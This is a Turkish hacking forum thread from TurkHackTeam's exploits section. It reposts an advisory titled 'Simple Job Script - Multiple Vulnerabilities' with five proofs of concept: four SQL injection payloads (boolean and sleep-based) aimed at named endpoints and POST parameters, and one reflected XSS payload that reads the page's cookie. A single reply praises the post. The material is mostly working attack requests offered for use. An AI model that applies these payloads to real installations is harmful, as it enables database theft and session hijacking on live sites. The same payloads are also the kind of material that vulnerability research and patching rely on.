• Yeni mesajlar

Menü

Giriş yap

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gece modu

Bize ulaşın

Kapat Menü

• TurkHackTeam Under Ground
• Exploitler

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

SJS Simple Job Script - SQL Injection / Cross-Site Scripting

• Konbuyu başlatan BAGAY
• Başlangıç tarihi 26 Mar 2019

BAGAY

Katılımcı Üye

13 Tem 2014

652

0

127.0.0.1

• 26 Mar 2019

• #1

# Exploit Başlığı: Simple Job Script - Multiple Vulnerabilities
# Date/Tarih: 26.03.2019
# Exploit Author/Exploit Yazarı: Ahmet Ümit BAYRAM
# Vendor Homepage/Yapımcı Anasayfa: https://simplejobscript.com/
# Download Link/Yazılım İndirme Linki:
https://github.com/niteosoft/simplejobscript/archive/master.zip
# Demo Site: https://demo.simplejobscript.com
# Version/Versiyon: Lastest/En son
# Tested on/Test Edilen Sistem: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/searched
Vulnerable Parameter: landing_******** (POST)
Payload:
landing_********=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test



----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/get_job_applications_ajax.php
Vulnerable Parameter: job_id (POST)
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/register-recruiters
Vulnerable Parameter: employerid (POST)
Payload: if(now()=sysdate(),sleep(0),0)


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/delete_application_ajax.php
Vulnerable Parameter: app_id (POST)
Payload:
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/


----- PoC 5: XSS -----

Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_********_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(********.cookie)>​

 

supremes

Uzman üye

15 Eyl 2018

1,325

1

Öteki taraf

• 26 Mar 2019

• #2

Gerçekten emek var, helal olsun

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• TurkHackTeam Under Ground
• Exploitler

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.